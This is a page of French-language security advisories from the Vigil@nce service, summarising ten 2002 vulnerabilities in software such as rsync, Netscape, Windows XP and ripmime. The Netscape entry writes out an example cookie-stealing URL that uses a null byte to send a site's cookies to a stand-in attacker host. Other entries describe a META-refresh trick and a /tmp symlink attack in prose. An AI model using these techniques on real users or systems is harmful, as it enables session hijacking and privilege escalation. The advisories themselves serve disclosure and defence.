The Vigil@nce team watches public vulnerabilities impacting your computers, and then offers security solutions, a database and tools to fix them.
History of vulnerabilities analyzed by Vigil@nce:

computer vulnerability CVE-2002-0048

Modification de mémoire avec rsync

Synthesis of the vulnerability

En provoquant un accès illicite à la mémoire du service rsync, un attaquant peut exécuter du code avec les droits administrateur.
Severity: 3/4.
Creation date: 28/01/2002.
Revisions dates: 29/01/2002, 31/01/2002, 01/02/2002, 04/02/2002, 07/02/2002, 11/02/2002, 17/09/2002, 18/11/2002.
Identifiers: BID-3958, CERTA-2002-AVI-015, CIAC M-035, CSSA-2002-003, CSSA-2002-003.0, CVE-2002-0048, DSA-106, DSA-106-2, FreeBSD-SA-02:10, M-035, MDKSA-2002:009, RHSA-2002:018, Slackware 20020125a, SUSE-SA:2002:004, V6-UNIXRSYNCSTACKBOF, VIGILANCE-VUL-2211, VU#800635.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

Le programme rsync permet aux utilisateurs et administrateurs de synchroniser (répliquer) une structure de fichiers et répertoires entre différentes machines. Ce service, écoutant sur les ports 873 tcp/udp, est exécuté avec des droits privilégiés, généralement administrateur.

Cependant une faille permettant réaliser un débordement de mémoire tampon a été découverte. En effet, si des valeurs négatives sont utilisées dans un tableau en mémoire, il est possible d'accéder à des zones mémoire privilégiées.

Un attaquant de l'intranet, peut générer des requêtes malicieuses vers le service rsync, modifier la mémoire de celui-ci et exécuter du code avec les droits administrateur sur la machine.

L'attaquant peut donc exécuter du code sur la machine avec les droits privilégiés.
Full Vigil@nce bulletin... (Free trial)

security note CVE-2002-0209

Obtention d'information par des connexions tcp Half-Close

Synthesis of the vulnerability

En réalisant des connexions http malicieuses sur le switch, un attaquant distant peut obtenir l'adresse ip réelle d'un serveur web.
Severity: 2/4.
Creation date: 28/01/2002.
Revisions dates: 11/02/2002, 13/03/2002, 19/03/2002.
Identifiers: BID-3964, CERTA-2002-AVI-060, CVE-2002-0209, V6-NORTELALTEONCOOKIES, VIGILANCE-VUL-2210.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

Les switch de niveau 7 Alteon ACEdirector possèdent de nombreuses fonctionnalités: load balancing (web, ssl, applications, etc.), qos, management de bande passante, filtrage de sessions tcp/ip, etc. Ces switch utilisent le système d'exploitation WebOS de Nortel Network.

Ces switch peuvent être utilisés pour répartir la charge d'un serveur web, par exemple:
 - le serveur http://www.serveur.com/ possède l'adresse ip 1.2.3.4,
 - cette adresse ip pointe vers le switch, elle est dite virtuelle,
 - le switch réparti les connexions http vers d'autres serveurs possèdant des adresses ip réelles (5.6.7.8, etc.).

Normalement les adresses ip réelles ne sont pas connues publiquement. Lorsqu'un client 10.0.0.1 réalise une requête http vers 1.2.3.4 :
 - le switch va diriger cette requête avec:
   adresse source: 1.2.3.4
   adresse destination: 5.6.7.8
 - le serveur répond avec:
   adresse source: 5.6.7.8
   adresse destination: 1.2.3.4
 - enfin le switch répond au client avec:
   adresse source: 1.2.3.4
   adresse destination: 10.0.0.1
Lors d'une telle session, un cookie et un identificateur de session sont créés par le switch.

La fonctionnalité TCP Half-Close permet à une des parties d'arrêter d'émettre. Par exemple, un client peut envoyer des données à un serveur, puis envoyer un FIN afin d'indiquer qu'il n'a plus de données à émettre. Le serveur, quant à lui, peut continuer à envoyer des données vers le client. Un client HTTP peut ainsi clore son émission après avoir envoyé son entête. Le serveur HTTP pourra alors tout de même émettre le résultat de la requête du client.

Une faille a été découverte dans la manière dont le switch manipule les cookies. En effet, dans le cas où des sessions http sont laissées dans l'état TCP Half-Close, il est alors possible d'obtenir l'adresse ip réelle du serveur web. Le switch répond alors avec:
   adresse source: 5.6.7.8
   adresse destination: 10.0.0.1

Un attaquant peut donc créer des sessions http malicieuses dans le but d'obtenir l'adresse ip réelle du serveur.
Full Vigil@nce bulletin... (Free trial)

weakness note 2209

Accroissement de privilèges lors du démarrage d'un processus suid ou sgid

Synthesis of the vulnerability

Lorsqu'un processus suid ou sgid démarre un autre processus une erreur d'atomicité permet d'accroître ses privilèges.
Severity: 2/4.
Creation date: 25/01/2002.
Revision date: 28/01/2002.
Identifiers: CERTA-2002-AVI-016, FreeBSD-SA-02:08, V6-FBEXECSUIDSGIDRACE, VIGILANCE-VUL-2209.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

Le bit suid indique que lors de l'exécution d'un programme, celui-ci doit posséder les droits de son propriétaire. De même, le bit sgid indique que lors de l'exécution d'un programme, celui-ci doit posséder les droits de son groupe.

La famille des fonctions exec() remplace le processus courant par l'image du nouveau processus.

Un débogueur analyse le fonctionnement d'un programme afin d'aider à la résolution de problèmes. Depuis le débogueur, un utilisateur peut aussi par exemple modifier les données ou les instructions du code exécuté. Un utilisateur local n'est normalement pas autorisé à déboguer un processus privilégié.

Une erreur d'atomicité a été découverte dans l'appel système exec :
 - si un programme est suid ou sgid, et
 - si ce programme fait un appel exec
alors, un attaquant peut attacher un débogueur au processus avant que celui-ci n'ait vérifié qu'il possède des droits élevés. L'attaquant peut alors modifier le déroulement du programme.

Cette vulnérabilité permet donc à un attaquant local d'accroître ses privilèges en utilisant des programmes suid ou sgid employant l'appel système exec.
Full Vigil@nce bulletin... (Free trial)

computer threat announce 2208

Déni de service par des fichiers manifest

Synthesis of the vulnerability

En créant des fichiers "manifest" malicieux, un attaquant local peut mener un déni de service sur la machine.
Severity: 1/4.
Creation date: 24/01/2002.
Identifiers: BID-3942, V6-XPBADMANIFESTFILEDOS, VIGILANCE-VUL-2208.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

Les fichiers "*.manifest" permettent de modifier l'apparence d'un programme exécuté sous XP (taille des boutons, couleurs, etc.). Par exemple le fichier associé au programme "prog.exe" est "prog.exe.manifest".

Ces fichiers contiennent du code XML offrant aux utilisateurs une modification simplifiée.

Cependant, une erreur de conception fait que si le code xml contenu dans ces fichiers est erroné, le programme associé ne sera pas exécuté.

Un attaquant local peut:
 - créer un fichier .manifest associé à un exécutable important pour le démarrage du système,
 - insérer des erreurs dans le code xml de ce fichier,
 - redémarrer la machine.
Tant que le fichier .manifest sera présent, le système ne pourra plus démarrer.

L'attaquant peut donc créer un fichier manifest malicieux dans le but de mener un déni de service sur la machine.
Full Vigil@nce bulletin... (Free trial)

vulnerability bulletin 2207

Buffer overflow de ripmime

Synthesis of the vulnerability

En provoquant un débordement de mémoire tampon, un attaquant local peut accroître ses privilèges sur le système.
Severity: 1/4.
Creation date: 24/01/2002.
Identifiers: BID-3941, V6-UNIXRIPMIMEBOF, VIGILANCE-VUL-2207.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

Le programme ripMIME permet d'extraire des fichiers attachés d'un e-mail encodé au format MIME.
Plusieurs options sont disponibles :
 "-i" spécifie le fichier MIME dont on veut extraire l'attachement
 "-d" spécifie le répertoire où le fichier sera extrait

Cependant, une faille a été découverte dans ripmime. En utilisant l'option -d avec un nom de répertoire très long, un débordement de mémoire tampon se produit.

Un attaquant local peut provoquer un tel débordement et exécuter du code malicieux avec les droits de ripmime.

Un attaquant peut donc exécuter du code avec les droits des utilisateurs de ripmime dans le but d'accroître ses privilèges sur le système.
Full Vigil@nce bulletin... (Free trial)

computer weakness alert 2206

Obtention de cookies par des url mal interprétées

Synthesis of the vulnerability

En concevant une url malicieuse, un attaquant distant peut obtenir les cookies d'un utilisateur.
Severity: 2/4.
Creation date: 23/01/2002.
Revisions dates: 31/01/2002, 06/02/2002.
Identifiers: BID-3925, HP182, V6-NETSCAPEURLCOOKIE, VIGILANCE-VUL-2206.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

Un cookie est un fichier généré lors d'une session HTTP entre un utilisateur et serveur web. Ce fichier permet de conserver les informations d'un utilisateur se connectant sur celui-ci. Par exemple cela évite à un utilisateur de s'authentifier à chaque nouvelle connexion, de sauvegarder ses préférences, etc. Normalement seul le serveur ayant founi ce cookie peut y accéder par la suite.

Cependant une vulnérabilité a été découverte permettant de contourner cette protection. En effet, l'url ci-dessous:
  http://attaquant.com%00.site.com/cgi-bin/cookies
conduit le navigateur à :
 - se connecter sur "attaquant.com" (le caractère %00 représente le caractère terminateur de chaîne en langage C),
 - mais à envoyer les cookies du domaine site.com

L'attaquant peut donc:
 - créer ce lien malicieux sur un serveur web ou dans un e-mail en HTML et
 - inciter l'utilisateur à cliquer sur celui-ci
Les cookies du domaine site.com sont alors envoyés à l'attaquant.

En utilisant cette vulnérabilité, un attaquant peut alors obtenir les cookies de l'utilisateur lui permettant par exemple d'usurper l'identité de celui-ci sur le serveur HTTP.
Full Vigil@nce bulletin... (Free trial)

computer weakness bulletin 2205

Corruption de fichier avec jmcce

Synthesis of the vulnerability

Un attaquant local peut créer ou modifier des fichiers avec les droits root, en employant jmcce.
Severity: 1/4.
Creation date: 23/01/2002.
Identifiers: BID-3940, MDKSA-2002:008, V6-LINUXJMCCETMPRACE, VIGILANCE-VUL-2205.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

Le programme jmcce permet d'entrer des caractères Chinois dans une console. Ce programme est suid root.

Les journaux de jmcce sont sauvegardés sous le répertoire /tmp.

Cependant, comme :
 - le répertoire /tmp est publiquement inscriptible,
 - le nom des journaux est connu et
 - jmcce accepte de suivre les liens symboliques,
un attaquant local peut créer un lien du nom de journal vers un fichier système. Ce dernier sera alors écrasé par jmcce avec les droits root.

Cette vulnérabilité permet donc à un attaquant local de créer ou corrompre des fichiers du système avec les droits administrateur.
Full Vigil@nce bulletin... (Free trial)

computer vulnerability bulletin 2204

Exécution des scripts enregistrés en "Speakable Items"

Synthesis of the vulnerability

A l'aide d'une page HTML malicieuse, un attaquant peut faire exécuter les scripts "Speakable Items" présent sur un ordinateur Macintosh.
Severity: 1/4.
Creation date: 23/01/2002.
Identifiers: BID-3935, V6-IE5MACSPEAKITEM, VIGILANCE-VUL-2204.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

Le navigateur web Internet Explorer peut être installé sur une machine Macintosh.

Les ordinateurs Macintosh proposent les "Speakable Items". Ces scripts, sont associés à un moteur de reconnaissance vocale. En parlant dans le microphone, l'utilisateur peut donc exécuter des commandes sur la machine. Par exemple, les scripts suivants sont installés par défaut :
 - Shut down the macintosh : extinction de l'ordinateur suite à une demande de confirmation
 - Change the resolution : modification de la résolution de l'écran
 - Close all windows : fermeture de toutes les fenêtres
 - Put computer to sleep : met l'ordinateur en mode de veille
 - etc.
Ces scripts sont localisés dans le répertoire :
  _nom_du_disque_/System Folder/Speakable Items/

Le langage HTML supporte les tags META qui ajoutent des informations aux pages HTML :
 - META NAME="Keywords" CONTENT="mots clés"
 - META NAME="Description" CONTENT="description"
 - META HTTP-EQUIV="refresh" CONTENT="une url à rafraîchir"
 - etc.

Un attaquant malicieux peut créer une page HTML contenant le tag META refresh dont l'url pointe vers un script Speakable Items. Lorsque l'utilisateur visualisera cette page, celle-ci sera rafraîchie, et le script sera exécuté.

Cette vulnérabilité permet donc à un attaquant distant de faire exécuter les Speakable Items dont il connaît le nom.
Full Vigil@nce bulletin... (Free trial)

vulnerability alert 2203

Accès au partage réseau avec le compte Invité

Synthesis of the vulnerability

En utilisant le compte "Invité", même si celui-ci est désactivé, un utilisateur du réseau peut accéder aux partages d'un utilisateur.
Severity: 1/4.
Creation date: 22/01/2002.
Identifiers: Q300489, V6-XPGUESTNOTDISABLED, VIGILANCE-VUL-2203.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

Les données d'une machine peuvent être accédées, depuis une autre machine, par le biais des partages réseau. Par défaut, lorsque l'on crée un partage réseau, les utilisateurs sont autorisés à lire et modifier les données du répertoire correspondant.

L'utilisateur Invité (ou Guest sur les versions anglaises) est un utilisateur spécial pouvant se connecter sans authentification.

Il est fortement recommandé de désactiver le compte Invité. Dans ce cas un utilisateur anonyme :
 - ne peut plus se connecter sur la console, ce qui est normal,
 - mais peut accéder aux partages réseau, ce qui semble illogique.
Microsoft indique que pour le bon fonctionnement du système, l'utilisateur Invité doit toujours pouvoir se connecter aux partages réseau.

Un attaquant peut donc se connecter sur des partages réseau en utilisant le compte Invité, malgré le fait que celui-ci puisse être désactivé.
Full Vigil@nce bulletin... (Free trial)

security vulnerability CVE-2002-0140

Déni de service de dnrd

Synthesis of the vulnerability

A l'aide de paquets malicieux, un attaquant peut stopper dnrd.
Severity: 1/4.
Creation date: 22/01/2002.
Identifiers: BID-3928, CVE-2002-0140, V6-UNIXDNRDBADPACKDOS, VIGILANCE-VUL-2202.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

Le programme dnrd est un proxy DNS. Il est généralement employé lorsque plusieurs accès à Internet sont disponibles. Dans ce cas, il se charge d'envoyer les requêtes, de la part du client, vers l'accès Internet actif.

Ce programme écoute donc sur le port udp/53 afin de recevoir les requêtes en provenance des clients situés sur le réseau interne.

Cependant, en envoyant des données aléatoires sur ce port, le démon se stoppe.

Cette vulnérabilité permet donc à un attaquant du réseau de mener un déni de service.
Full Vigil@nce bulletin... (Free trial)

   

Direct access to page 1 21 41 61 81 101 121 141 161 181 201 205 206 207 208 209 210 211 212 213 215 217 218 219 220 221 222 223 224 225 241 261 281 301 321 341 361 381 401 421 441 461 481 501 521 541 561 581 601 621 641 661 681 701 721 741 761 781 801 821 841 861 881 901 921 941 961 981 1001 1021 1041 1061 1081 1101 1121 1141 1161 1181 1201 1221 1241 1261 1281 1301 1321 1341 1361 1381 1401 1421 1441 1461 1481 1501 1521 1541 1561 1581 1601 1621 1641 1661 1681 1701 1721 1741 1761 1781 1801 1821 1841 1861 1881 1901 1921 1941 1961 1981 2001 2021 2041 2061 2081 2101 2121 2141 2161 2181 2201 2221 2241 2261 2281 2301 2321 2341 2361 2381 2401 2421 2441 2461 2481 2501 2521 2541 2561 2581 2601 2621 2641 2661 2681 2701 2721 2741 2761 2781 2801 2821 2841 2861 2881 2901 2921 2924